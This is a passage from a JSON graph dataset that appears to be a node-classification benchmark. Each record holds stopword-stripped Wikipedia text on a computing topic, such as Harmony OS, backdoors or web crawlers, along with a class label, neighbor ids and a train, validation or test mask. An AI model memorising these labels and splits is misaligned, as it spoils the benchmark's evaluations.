operating system designed internet things iot hardware 9 august 2019 huawei officially unveiled harmony os inaugural developers conference dongguan huawei described harmony open source microkernel-based distributed operating system various types hardware faster inter-process communication qnx google fuchsia microkernel real-time resource allocation ark compiler used port android apk packages os huawei stated developers would able flexibly deploy harmony os software across various device categories company focused primarily iot devices including smart displays wearable devices in-car entertainment systems explicitly position harmony os mobile os huawei stated harmony os would initially used devices targeting chinese market company subsidiary brand honor unveiled honor vision line smart tvs first consumer electronics devices run harmony os",
    "neighbors": [
      2560,
      6155,
      11282,
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      4643,
      6180,
      5158,
      7217,
      10803,
      9784,
      10809,
      1083,
      10303,
      576,
      2625,
      6221,
      3160,
      10333,
      97,
      11363,
      6760,
      10856,
      8298,
      9835,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      8879,
      3248,
      7857,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      9932,
      5840,
      2259,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      7403,
      8940,
      242,
      5363,
      9466,
      2811,
      9468,
      1278,
      10499,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      10016,
      292,
      10235,
      2345,
      7983,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      5452,
      6988,
      5457,
      11601,
      7507,
      7511,
      5467,
      10590,
      3426,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11667,
      11675,
      8092,
      2462,
      5022,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      10676,
      6075,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      9166,
      10730,
      10731,
      8687,
      6128,
      5105,
      5619,
      5115
    ],
    "mask": "Test"
  },
  {
    "node_id": 98,
    "label": 5,
    "text": "TCP/IP_Illustrated:tcp/ip illustrated tcp/ip illustrated name series 3 books written w. richard stevens unlike traditional books explain rfc specifications stevens goes great detail using actual network traces describe protocol hence 'illustrated title first book series volume 1 protocols cited hundreds technical papers acm journals brief introduction tcp/ip stevens takes bottom-up approach describing protocol link layer working protocol stack second edition published 11/15/2011 500 illustrations combined 15,000 lines actual code 4.4bsd-lite release serves concrete examples concepts covered volume 1 volume goes detail four topics volume 2 examples 4.4bsd-lite used",
    "neighbors": [
      8516,
      3695,
      592,
      3218,
      10005
    ],
    "mask": "Test"
  },
  {
    "node_id": 99,
    "label": 3,
    "text": "Comparison_of_ARMv7-A_cores:comparison armv7-a cores table comparing microarchitectures implement armv7-a means application instruction set architecture mandatory optional extensions last aarch32",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      8812,
      10361,
      638,
      644,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      5358,
      6391,
      3835,
      2814,
      781,
      6926,
      5417,
      810,
      2862,
      7988,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      1428,
      4508,
      5028,
      7077,
      9638,
      10675,
      1461,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      1014,
      3575
    ],
    "mask": "Validation"
  },
  {
    "node_id": 100,
    "label": 9,
    "text": "Magma_(computer_algebra_system):magma computer algebra system magma computer algebra system designed solve problems algebra number theory geometry combinatorics named algebraic structure magma runs unix-like operating systems well windows magma produced distributed computational algebra group within school mathematics statistics university sydney late 2006 book discovering mathematics magma published springer volume 19 algorithms computations mathematics series magma system used extensively within pure mathematics computational algebra group maintain list publications cite magma 2010 2600 citations mostly pure mathematics also including papers areas diverse economics geophysics predecessor magma system named cayley 1982–1993 arthur cayley magma officially released august 1993 version 1.0 version 2.0 magma released june 1996 subsequent versions 2.x released approximately per year 2013 computational algebra group finalized agreement simons foundation whereby simons foundation underwrite costs providing magma u.s. non-profit non-governmental scientific research educational institutions students researchers faculty associated participating institution able access magma free institution",
    "neighbors": [
      1923,
      5830,
      4840,
      5612,
      6797,
      7983,
      5397,
      7326
    ],
    "mask": "Test"
  },
  {
    "node_id": 101,
    "label": 4,
    "text": "Troy_Hunt:troy hunt troy hunt australian web security expert known public education outreach security topics created pwned data breach search website allows non-technical users see personal information compromised also authored several popular security-related courses pluralsight regularly presents keynotes workshops security topics also creator asafaweb tool performs automated security analysis asp.net websites starting 2011 hunt named microsoft valuable professional mvp developer security recognized microsoft mvp year 2011 also named microsoft regional director 2016 part work administering pwned hibp website hunt frequently involved publication data breaches often cited journalists data breach expert june 2018 hibp contains 5 billion compromised user accounts governments australia united kingdom spain use service monitor official domains popular services 1password eve online okta kogan integrated hibp account verification process hibp included gizmodo october 2018 list 100 websites shaped internet know august 2015 following ashley madison data breach hunt received many emails ashley madison members asking help criticized company poor job informing userbase february 2016 children toy maker vtech suffered major data breach months earlier updated terms service absolve wrongdoing event future breaches hunt added data vtech breach databases pwned published blog post harshly criticizing vtech new policy calling grossly negligent later removed vtech breach database citing two people besides access data wishing reduce chance spread february 2017 hunt published details vulnerabilities internet-connected children toy cloudpets allowed access 820,000 user records well 2.2 million audio files belonging users november 2017 hunt testified united states house committee energy commerce impact data breaches also november 2017 hunt joined report uri project launched 2015 scott helme allows real time monitoring csp hpkp violations website bringing funding expertise project hunt known efforts security education computer professionals created several dozen courses pluralsight online education training website computer creative professionals one primary course authors pluralsight ethical hacking path collection courses designed certified ethical hacker certification additionally hunt works education speaking technology conferences running workshops primary workshop titled hack first aims teach software developers little security background defend applications looking attacker perspective",
    "neighbors": [
      1251,
      3941,
      357,
      9293,
      7790,
      10190,
      5587,
      2169,
      7708,
      10110
    ],
    "mask": "Validation"
  },
  {
    "node_id": 102,
    "label": 9,
    "text": "ColdFusion_on_Wheels:coldfusion wheels coldfusion wheels often shortened cfwheels wheels open-source web application framework designed applications written coldfusion markup language cfwheels designed bring many concepts ruby rails coldfusion railo lucee developers aim simple use allow rapid development make use model–view–controller architectural pattern implements active record pattern built object-relational mapping",
    "neighbors": [
      1920,
      3462,
      8582,
      3469,
      2062,
      9614,
      2576,
      9618,
      148,
      1812,
      4507,
      6941,
      9245,
      10526,
      4512,
      8739,
      3876,
      4777,
      5165,
      7983,
      4529,
      7987,
      692,
      8883,
      7862,
      3895,
      5048,
      9144,
      6074,
      190,
      5314,
      9666,
      8644,
      11259,
      1353,
      595,
      84,
      4056,
      6493,
      8554,
      5612,
      8691,
      119,
      3705,
      9467
    ],
    "mask": "None"
  },
  {
    "node_id": 103,
    "label": 2,
    "text": "Mongoose_OS:mongoose os mongoose os internet things iot firmware development framework available apache license version 2.0 supports low power connected microcontrollers esp32 esp8266 ti cc3200 ti cc3220 stm32 stm32l4 stm32f4 stm32f7 series purpose complete environment prototyping development managing connected devices designed reduce time costs associated iot projects developped cesanta software ltd. company based dublin ireland dual licensed mongoose os open source dual-licensed",
    "neighbors": [
      7338,
      7235,
      3462
    ],
    "mask": "Test"
  },
  {
    "node_id": 104,
    "label": 3,
    "text": "Terminus_(1986_video_game):terminus 1986 video game terminus also known terminus prison planet video game mastertronic released 1986 zx spectrum msx amstrad cpc game set inside futuristic prison consisting 512 screens purpose release brain leader teenage gang called wanglers player controls one four characters mobod xann move flying spex moves around bouncing magno uses reverse gravity cling roofs feature used 2010 windows os x game vvvvvv player change characters using one transports hidden around prison must unlock sections prison using teleports game player must also avoid traps include lava pools needle beams creatures compressor rooms activated touching wall sensors well numerous guards energy restored using recharge units located around prison complex",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 105,
    "label": 7,
    "text": "Globus_Alliance:globus alliance globus alliance international association founded university chicago argonne national laboratory dedicated developing fundamental technologies needed build grid computing infrastructures globus alliance officially established september 2003 globus project established 1995 grid persistent environment enables software applications integrate instruments displays computational information resources managed diverse organizations widespread locations grids currently use many research institutions used study subjects cosmology high energy physics globus alliance implements standards developed open grid forum ogf open source globus toolkit grid middleware component provides standard platform services build upon grid computing also needs components tools operate support grid environment",
    "neighbors": [
      5283,
      5956,
      1449,
      10641,
      2710,
      2040,
      11353,
      8122,
      158,
      7935
    ],
    "mask": "Test"
  },
  {
    "node_id": 106,
    "label": 4,
    "text": "Download.com:download.com download.com internet download directory website launched 1996 part cnet originally domain download.com became download.com.com download.cnet.com domain download.com attracted least 113 million visitors annually 2008 according compete.com study offered content available four major categories software including windows mac mobile music games videos offered download via ftp download.com servers third-party servers videos streams present music free mp3 downloads occasionally rights-managed wmas streams replaced last.fm software section includes 100,000 freeware shareware try-first downloads downloads often rated reviewed editors contain summary file software publisher registered users may also write reviews rate product software publishers permitted distribute titles via cnet upload.com site free fee structure offers enhancements cnet uses spigot inc monetize traffic download.com according sean murphy general manager cnet spigot continues great partner download.com sharing desire balance customer experience revenue august 2011 download.com introduced installation manager called cnet techtracker delivering many software titles catalog installer included trojans bloatware toolbars cnet admitted download faq small number security publishers flagged installer adware potentially unwanted application december 2011 gordon lyon writing pseudonym fyodor wrote strong dislike installation manager bundled software post popular social networks reported dozen media main problem confusion content offered download.com software offered original authors accusations included deception well copyright trademark violation 2014 register us-cert warned via download.com foistware attacker may able download execute arbitrary code 2015 research emsisoft suggested free download providers bundled downloads potentially unwanted software download.com worst offender study done how-to geek 2015 revealed download.com packaging malware inside installers test done virtual machine testers downloaded top 10 apps contained crapware/malware one example kmplayer installer installed rogue antivirus named 'pro pc cleaner attempted execute codice_1 downloads specifically ytd completely blocked avast another study done how-to geek 2015 revealed download.com installing fake ssl certificates inside installers similar lenovo superfish certificate fake certificates completely compromise ssl encryption allow man-in-the-middle attacks however july 2016 how-to geek discovered download.com longer included adware/malware downloads installer program discontinued",
    "neighbors": [
      8204,
      9744,
      1046,
      4374,
      925,
      9885,
      10787,
      550,
      3114,
      9771,
      10027,
      5935,
      2107,
      7364,
      4421,
      4309,
      8024,
      6747,
      7515,
      735,
      10722,
      8805,
      488,
      877,
      6382,
      4081,
      115,
      5114,
      4605,
      6270
    ],
    "mask": "Validation"
  },
  {
    "node_id": 107,
    "label": 4,
    "text": "Backdoor_(computing):backdoor computing backdoor method often secret bypassing normal authentication encryption computer system product embedded device e.g home router embodiment e.g part cryptosystem algorithm chipset homunculus computer —a tiny computer-within-a-computer found intel amt technology backdoors often used securing remote access computer obtaining access plaintext cryptographic systems backdoor may used gain access passwords delete data hard drives transfer information within cloud backdoor may take form hidden part program separate program e.g back orifice may subvert system rootkit code firmware hardware parts operating system windows trojan horses used create vulnerabilities device trojan horse may appear entirely legitimate program executed triggers activity may install backdoor although secretly installed backdoors deliberate widely known kinds backdoors legitimate uses providing manufacturer way restore user passwords many systems store information within cloud fail create accurate security measures many systems connected within cloud hackers gain access platforms vulnerable system default passwords default credentials function backdoors changed user debugging features also act backdoors removed release version 1993 united states government attempted deploy encryption system clipper chip explicit backdoor law enforcement national security access chip unsuccessful threat backdoors surfaced multiuser networked operating systems became widely adopted petersen turn discussed computer subversion paper published proceedings 1967 afips conference noted class active infiltration attacks use trapdoor entry points system bypass security facilities permit direct access data use word trapdoor clearly coincides recent definitions backdoor however since advent public key cryptography term trapdoor acquired different meaning see trapdoor function thus term backdoor preferred term trapdoor went use generally security breaches discussed length rand corporation task force report published arpa sponsorship j.p. anderson d.j edwards 1970 backdoor login system might take form hard coded user password combination gives access system example sort backdoor used plot device 1983 film wargames architect wopr computer system inserted hardcoded password gave user access system undocumented parts system particular video game-like simulation mode direct interaction artificial intelligence although number backdoors systems using proprietary software software whose source code publicly available widely credited nevertheless frequently exposed programmers even succeeded secretly installing large amounts benign code easter eggs programs although cases may involve official forbearance actual permission countermeasure backdoors open-source software source code examined potential backdoors usually harder ″hide″ backdoor combined reproducible builds one also sure provided binary corresponds publicly available source code number cloak dagger considerations come play apportioning responsibility covert backdoors sometimes masquerade inadvertent defects bugs reasons plausible deniability cases might begin life actual bug inadvertent error discovered deliberately left unfixed undisclosed whether rogue employee personal advantage c-level executive awareness oversight also possible entirely above-board corporation technology base covertly untraceably tainted external agents hackers though level sophistication thought exist mainly level nation state actors example photomask obtained photomask supplier differs gates photomask specification chip manufacturer would hard-pressed detect otherwise functionally silent covert rootkit running photomask etching equipment could enact discrepancy unbeknown photomask manufacturer either means one backdoor potentially leads another hypothetical scenario essentially silicon version undetectable compiler backdoor discussed general terms long dependency-chains modern highly specialized technological economy innumerable human-elements process control-points make difficult conclusively pinpoint responsibility time covert backdoor becomes unveiled even direct admissions responsibility must scrutinized carefully confessing party beholden powerful interests many computer worms sobig mydoom install backdoor affected computer generally pc broadband running microsoft windows microsoft outlook backdoors appear installed spammers send junk e-mail infected machines others sony/bmg rootkit placed secretly millions music cds late 2005 intended drm measures—and case data-gathering agents since surreptitious programs installed routinely contacted central servers sophisticated attempt plant backdoor linux kernel exposed november 2003 added small subtle code change subverting revision control system case two-line change appeared check root access permissions caller sys_wait4 function used assignment codice_1 instead equality checking codice_2 actually granted permissions system difference easily overlooked could even interpreted accidental typographical error rather intentional attack january 2014 backdoor discovered certain samsung android products like galaxy devices samsung proprietary android versions fitted backdoor provides remote access data stored device particular samsung android software charge handling communications modem using samsung ipc protocol implements class requests known remote file server rfs commands allows backdoor operator perform via modem remote i/o operations device hard disk storage modem running samsung proprietary android software likely offers over-the-air remote control could used issue rfs commands thus access file system device harder detect backdoors involve modifying object code rather source code – object code much harder inspect designed machine-readable human-readable backdoors inserted either directly on-disk object code inserted point compilation assembly linking loading – latter case backdoor never appears disk memory object code backdoors difficult detect inspection object code easily detected simply checking changes differences notably length checksum cases detected analyzed disassembling object code object code backdoors removed assuming source code available simply recompiling source thus backdoors avoid detection extant copies binary must subverted validation checksums must also compromised source must unavailable prevent recompilation alternatively tools length checks diff checksumming disassemblers compromised conceal backdoor example detecting subverted binary checksummed returning expected value actual value conceal subversions tools must also conceal changes – example subverted checksummer must also detect checksumming subverted tools return false values leads extensive changes system tools needed conceal single change object code regenerated recompiling reassembling relinking original source code making persistent object code backdoor without modifying source code requires subverting compiler – detects compiling program attack inserts backdoor – alternatively assembler linker loader requires subverting compiler turn fixed recompiling compiler removing backdoor insertion code defense turn subverted putting source meta-backdoor compiler detects compiling inserts meta-backdoor generator together original backdoor generator original program attack done source meta-backdoor removed compiler recompiled original source compromised compiler executable backdoor bootstrapped attack dates popularized thompson 1984 article entitled reflections trusting trust hence colloquially known trusting trust attack see compiler backdoors details analogous attacks target lower levels system operating system inserted system booting process also mentioned exist form boot sector viruses traditional backdoor symmetric backdoor anyone finds backdoor turn use notion asymmetric backdoor introduced adam young moti yung proceedings advances cryptology crypto '96 asymmetric backdoor used attacker plants even full implementation backdoor becomes public e.g. via publishing discovered disclosed reverse engineering etc. also computationally intractable detect presence asymmetric backdoor black-box queries class attacks termed kleptography carried software hardware example smartcards combination two theory asymmetric backdoors part larger field called cryptovirology notably nsa inserted kleptographic backdoor dual_ec_drbg standard exists experimental asymmetric backdoor rsa key generation openssl rsa backdoor designed young yung utilizes twisted pair elliptic curves made available sophisticated form black box backdoor compiler backdoor compiler subverted insert backdoor program login program modified detect compiling inserts backdoor insertion code targeting program code-modifying self-compilation like mechanism retroviruses infect host done modifying source code resulting compromised compiler object code compile original unmodified source code insert exploit boot-strapped attack originally presented united states air force security analysis multics described attack pl/i compiler call compiler trap door also mention variant system initialization code modified insert backdoor booting complex poorly understood call initialization trapdoor known boot sector virus attack actually implemented popularized ken thompson turing award acceptance speech 1983 published 1984 reflections trusting trust points trust relative software one truly trust code every step bootstrapping inspected backdoor mechanism based fact people review source human-written code compiled machine code object code program called compiler used create second first compiler usually trusted honest job thompson paper describes modified version unix c compiler would compiler compiled program users would extremely unlikely notice machine code instructions performed tasks second task compiler source code would appear clean worse thompson proof concept implementation subverted compiler also subverted analysis program disassembler anyone examined binaries usual way would actually see real code running something else instead updated analysis original exploit given historical overview survey literature given thompson version officially never released wild believed however version distributed bbn least one use backdoor recorded scattered anecdotal reports backdoors subsequent years attack recently august 2009 discovered sophos labs w32/induc-a virus infected program compiler delphi windows programming language virus introduced code compilation new delphi programs allowing infect propagate many systems without knowledge software programmer attack propagates building trojan horse especially hard discover believed induc-a virus propagating least year discovered system compromised backdoor trojan horse trusting trust compiler hard rightful user regain control system – typically one rebuild clean system transfer data executables however several practical weaknesses trusting trust scheme suggested example sufficiently motivated user could painstakingly review machine code untrusted compiler using mentioned ways hide trojan horse subverting disassembler ways counter defense writing disassembler scratch generic method counter trusting trust attacks called diverse double-compiling ddc method requires different compiler source code compiler-under-test source compiled compilers results two different stage-1 compilers however behavior thus source compiled stage-1 compilers must result two identical stage-2 compilers formal proof given latter comparison guarantees purported source code executable compiler-under-test correspond assumptions method applied author verify c compiler gcc suite v. 3.0.4 contained trojan using icc v. 11.0 different compiler practice verifications done end users except extreme circumstances intrusion detection analysis due rarity sophisticated attacks programs typically distributed binary form removing backdoors including compiler backdoors typically done simply rebuilding clean system however sophisticated verifications interest operating system vendors ensure distributing compromised system high-security settings attacks realistic concern",
    "neighbors": [
      3072,
      5636,
      9732,
      10245,
      10756,
      5131,
      8715,
      9227,
      9233,
      9745,
      9242,
      2041,
      9761,
      2084,
      9256,
      9771,
      3629,
      4654,
      6189,
      2045,
      10297,
      3643,
      7739,
      9791,
      1088,
      10303,
      4165,
      7238,
      1101,
      4689,
      7251,
      8281,
      91,
      4703,
      10338,
      2147,
      2154,
      6772,
      5245,
      5246,
      3711,
      642,
      6786,
      5764,
      9346,
      9356,
      6797,
      8333,
      1683,
      4245,
      10392,
      1690,
      3742,
      9375,
      2208,
      5281,
      2213,
      7337,
      7855,
      700,
      3262,
      3774,
      8387,
      6344,
      7368,
      5325,
      7887,
      2262,
      6360,
      3290,
      4314,
      10971,
      8413,
      2275,
      6373,
      4344,
      3320,
      7418,
      2811,
      10492,
      5373,
      7421,
      4863,
      1279,
      5389,
      9488,
      4369,
      7441,
      1299,
      2324,
      4883,
      278,
      790,
      8978,
      3867,
      4892,
      5404,
      1827,
      8998,
      11051,
      300,
      3886,
      3887,
      5935,
      7983,
      3890,
      8502,
      5433,
      5435,
      3395,
      6981,
      1353,
      6985,
      331,
      11081,
      6993,
      858,
      7515,
      4444,
      4956,
      1892,
      3941,
      8037,
      11621,
      9068,
      877,
      4464,
      5492,
      9591,
      4475,
      2430,
      11137,
      899,
      7044,
      3462,
      9607,
      1930,
      5516,
      4493,
      9102,
      11662,
      3473,
      10132,
      6550,
      10141,
      9630,
      2975,
      1952,
      3495,
      9640,
      939,
      9646,
      1970,
      4023,
      6588,
      10173,
      11197,
      3525,
      9160,
      2508,
      6606,
      3032,
      9688,
      2525,
      1504,
      7139,
      9187,
      8171,
      11244,
      6129,
      6643,
      3065,
      4605,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 108,
    "label": 4,
    "text": "Memory_bound_function:memory bound function memory bound refers situation time complete given computational problem decided primarily amount memory required hold data application memory bound functions could prove valuable preventing spam become problem epidemic proportions internet memory bound functions memory functions related involve extensive memory access distinction exists two memory functions use dynamic programming technique called memoization order relieve inefficiency recursion might occur based simple idea calculating storing solutions subproblems solutions reused later without recalculating subproblems best known example takes advantage memoization algorithm computes fibonacci numbers following pseudocode illustrates algorithm uses memoization runs linear cpu time compare algorithm uses recursion runs exponential cpu time recursive algorithm simpler elegant algorithm uses memoization latter significantly lower time complexity former term memory bound function surfaced recently used principally describe function uses xor consists series computations computation depends previous computation whereas memory functions long important actor improving time complexity memory bound functions seen far fewer applications recently however scientists proposed method using memory bound functions means discourage spammers abusing resources could major breakthrough area 1992 ibm research scientists cynthia dwork moni naor published paper titled pricing via processing combating junk mail suggesting possibility using cpu bound functions deter abusers sending spam scheme based idea computer users much likely abuse resource cost abusing resource negligible underlying reason spam become rampant sending e-mail minuscule cost spammers dwork naor proposed spamming might reduced injecting additional cost form expensive cpu computation cpu bound functions would consume cpu resources sender machine message thus preventing huge amounts spam sent short period basic scheme protects abuses follows let sender recipient e-mail agreed beforehand receive e-mail transmitted usual way otherwise computes function sends checks receives form yes accepts otherwise rejects figure right depicts cases prior agreements function selected verification relatively fast taking millisecond computation somewhat slow involving least several seconds therefore discouraged sending multiple recipients prior agreements cost terms time computing resources computing repeatedly become prohibitive spammer intends send many millions e-mails major problem using scheme fast cpus compute much faster slow cpus higher-end computer systems also sophisticated pipelines advantageous features facilitate computations result spammer state-of-the-art system hardly affected deterrence typical user mediocre system adversely affected computation takes seconds new pc may take minute old pc several minutes pda might nuisance users old pcs probably unacceptable users pdas disparity client cpu speed constitutes one prominent roadblocks widespread adoption scheme based cpu bound function therefore researchers concerned finding functions computer systems evaluate speed high-end systems might evaluate functions somewhat faster low-end systems 2-10 times faster 10-100 faster cpu disparities might imply ratios “ egalitarian enough intended applications functions effective discouraging abuses add prohibitive delay legitimate interactions across wide range systems new egalitarian approach rely memory bound functions stated memory bound function function whose computation time dominated time spent accessing memory memory bound function accesses locations large region memory unpredictable way way using caches effective recent years speed cpu grown drastically comparatively small progress developing faster main memory since ratios memory latencies machines built last five years typically greater two almost always less four memory bound function egalitarian systems foreseeable future",
    "neighbors": [
      2396,
      9044,
      7311
    ],
    "mask": "Test"
  },
  {
    "node_id": 109,
    "label": 2,
    "text": "Nokia_X2-00:nokia x2-00 nokia x2-00 first low budget phone xseries line nokia single sim phone announced april 2010 released 3 months later july 2010 runs series 40 comes many pre-installed games also supports messaging data connections phone 240 x 320 256k tft display screen 2.20 inches ~28.7 screen body ratio weighs 81.00gm comes rear camera 5mp 2592 x 1944 px also video recording qvga 320 x 240px data connection gprs edge device also supports bluetooth usb connections lacks infrared wi-fi gps ram 64mb rom 128mb supports expandable memory 16gb microsd 860mah bl-4c removable battery supports standby 624 hours talk time 13h 30min sar eu 0.82 w/kg head slim stylish feature phone comes 2 colors red black blue silver phone good multimedia features supports midp1.0 java phone successfully play mp3 wmv nrt nokia ringing tone wma eaac+ audios also mp4 h.263 videos inbuilt antennae gives clarity fm radio also rds stereo left side seek play/pause buttons used control music/video/radio photo editor software phone also adds effects photos 8 games nokia x2-00 bounce tales city bloxx diamond rush sudoku snake iii brain champion block 'd rally 3d device supports networking via gprs edge also maximum download speed 0.236 mbit/s",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      5998,
      8433,
      1533
    ],
    "mask": "Train"
  },
  {
    "node_id": 110,
    "label": 7,
    "text": "Bullhorn,_Inc.:bullhorn inc. bullhorn cloud computing company headquartered boston massachusetts company provides customer relationship management crm applicant tracking system ats operations software staffing industry 2018 company reported 8,000 customers 150 countries besides boston headquarters company operations st. louis london brighton vancouver sydney rotterdam bullhorn founded 1999 roger colvin barry hinckley art papas papas continues serve ceo company originally launched platform freelancers find collaborate work 2001 changed focus build crm software vertical markets company historically focused providing software-as-a-service third-party staffing recruiting firms allowing manage business operations single web-based platform became one largest providers technology staffing recruiting market reportedly growing revenue 2 million 2004 20 million 2009 33.6 million 2011 67 million 2013 bullhorn raised first round venture capital funding 1999 4 million investment ge asset management internet.com raised 26 million general catalyst partners highland capital partners 2008 june 2012 vista equity partners acquired bullhorn reported price several hundred million dollars july 2015 industry research firm gartner included bullhorn first time magic quadrant report salesforce automation alongside companies deems leaders providing tools support automation sales account management activities processes january 2016 company reported momentum press release would exceed nine figures annual revenue first time history vista ownership company quadrupled revenue focusing serving staffing recruiting industry acquiring several companies including maxhire solutions sendouts code works easy software solutions makers timesheasy april 2016 bullhorn moved boston headquarters ft. point district downtown crossing june 2017 engage conference bullhorn announced new suite software healthcare staffing firms september 2017 bullhorn international acquired connexys leading provider recruitment solutions mainland europe supercharge expansion mainland europe october 2017 insight venture partners acquired bullhorn vista company also announced cloud-based middle office strategy provide enterprise recruiting companies front-to-back solution november 2017 bullhorn acquired peoplenet leading provider cloud-based workforce management solutions company also announced official closing insight venture partners ’ acquisition bullhorn included investment genstar capital march 2018 bullhorn acquired talent rover jobscience two leading providers recruitment software built salesforce platform",
    "neighbors": [
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 111,
    "label": 4,
    "text": "Panorama9:panorama9 panorama9 cloud-based service within enterprise network management company sells hosted dashboard monitoring everything network ensuring servers pc peripherals external internet related services running furthermore panorama9 offers set reports inventory hardware software users founded 2010 serial entrepreneurs allan thorvaldsen diego ’ ambra also founded msp softcom solutions aps 1996 softscan 2003 end 2009 softscan achieved 12.000 customers softscan later year sold symantec panorama9 provides cloud-based remote monitoring management rmm remote_monitoring_and_management tool made possible downloading simple agent pcs servers need monitored throughout network november 2011 interactive network map introduced making possible administrators real-time chart network granular level may 2012 zendesk panorama9 announced partnership strengthening offering zendesk panorama9 integrations extended include autotask desk.com computicate psa warrantymaster glue team viewer nagios microsoft ad azure ad microsoft rdp saml etc wich integrate panorama9 way around 2014 msp control panel developed allowing msp create multiple clients apply templates easily manage multiple clients one dashboard api released contines maintained 2017 mobile app released allowing msp well internal departments monitor manage infrastructure go company founded copenhagen incorporated us headquarter san francisco california sales development team remains copenhagen",
    "neighbors": [
      9569,
      11611
    ],
    "mask": "Test"
  },
  {
    "node_id": 112,
    "label": 5,
    "text": "TCP_acceleration:tcp acceleration tcp acceleration name series techniques achieving better throughput network connection standard tcp achieves without modifying end applications alternative supplement tcp tuning commonly used approaches include checksum offloading tcp segmentation reassembly offloading dma offloading ack pacing tcp transparent proxies two middleboxes tcp offload engines tcp transparent proxies involve breaking long end-to-end control loops several smaller control loops intercepting relaying tcp connections within network adopting procedure allow tcp flows shorter reaction time packet losses may occur within network thus guarantees higher throughput idea tcp accelerator terminate tcp connections inside network processor relay data second connection toward end system data packets originate sender buffered accelerator node responsible performing local retransmissions event packet loss thus case losses feedback loop sender receiver shortened one acceleration node receiver guarantees faster delivery data receiver since tcp rate-adaptive protocol rate tcp sender injects packets network directly proportional prevailing load condition within network well processing capacity receiver prevalent conditions within network judged sender basis acknowledgments received acceleration node splits feedback loop sender receiver thus guarantees shorter round trip time rtt per packet shorter rtt beneficial ensures quicker response time changes network faster adaptation sender combat changes disadvantages method include fact tcp session directed accelerator means routing changes accelerator longer path connection broken also destroys end-to-end property tcp ack mechanism ack received sender packet stored accelerator delivered receiver tcp proxies require devices deployed parties communication protocol running proxies usually proprietary asymmetric tcp acceleration able boost network performance unilateral deployment i.e. one end peers required deploy device software asymmetric tcp acceleration implies wan-side protocol tcp 5-tuples states implementations typically terminate tcp flows lan side like tcp proxies wan side however mirror tcp state machines establish forward tcp flows peers accelerate usually run compatible version tcp performance improvements wan side improvements fast tcp zeta-tcp etc. focused tcp congestion avoidance algorithm also attempt promote performance aspects protocol instance zeta-tcp provides accurate loss detection heuristic download acceleration addition congestion avoidance algorithm compared symmetric tcp proxies asymmetric tcp acceleration flexible kinds deployment scenarios typical setup deploy asymmetric acceleration device server side accessing clients without install extra software benefit performance-wise without compression factors asymmetric tcp acceleration capable offering level improvement symmetric ones however symmetric deployment proxies able perform data compression caching operations boost performance factor compression ratio drawback compression/caching though added latency burst receiver side",
    "neighbors": [
      10115,
      10853,
      2985,
      1835,
      10924,
      4725,
      9021
    ],
    "mask": "Train"
  },
  {
    "node_id": 113,
    "label": 8,
    "text": "Web_crawler:web crawler web crawler sometimes called spider spiderbot often shortened crawler internet bot systematically browses world wide web typically purpose web indexing web spidering web search engines sites use web crawling spidering software update web content indices others sites web content web crawlers copy pages processing search engine indexes downloaded pages users search efficiently crawlers consume resources visited systems often visit sites without approval issues schedule load politeness come play large collections pages accessed mechanisms exist public sites wishing crawled make known crawling agent example including robots.txt file request bots index parts website nothing number internet pages extremely large even largest crawlers fall short making complete index reason search engines struggled give relevant search results early years world wide web 2000 today relevant results given almost instantly crawlers validate hyperlinks html code also used web scraping see also data-driven programming web crawler also known spider ant automatic indexer foaf software context web scutter web crawler starts list urls visit called seeds crawler visits urls identifies hyperlinks pages adds list urls visit called crawl frontier urls frontier recursively visited according set policies crawler performing archiving websites copies saves information goes archives usually stored way viewed read navigated live web preserved ‘ snapshots archive known repository designed store manage collection web pages repository stores html pages pages stored distinct files repository similar system stores data like modern day database difference repository need functionality offered database system repository stores recent version web page retrieved crawler large volume implies crawler download limited number web pages within given time needs prioritize downloads high rate change imply pages might already updated even deleted number possible urls crawled generated server-side software also made difficult web crawlers avoid retrieving duplicate content endless combinations http get url-based parameters exist small selection actually return unique content example simple online photo gallery may offer three options users specified http get parameters url exist four ways sort images three choices thumbnail size two file formats option disable user-provided content set content accessed 48 different urls may linked site mathematical combination creates problem crawlers must sort endless combinations relatively minor scripted changes order retrieve unique content edwards et al noted given bandwidth conducting crawls neither infinite free becoming essential crawl web scalable efficient way reasonable measure quality freshness maintained crawler must carefully choose step pages visit next behavior web crawler outcome combination policies given current size web even large search engines cover portion publicly available part 2009 study showed even large-scale search engines index 40-70 indexable web previous study steve lawrence lee giles showed search engine indexed 16 web 1999 crawler always downloads fraction web pages highly desirable downloaded 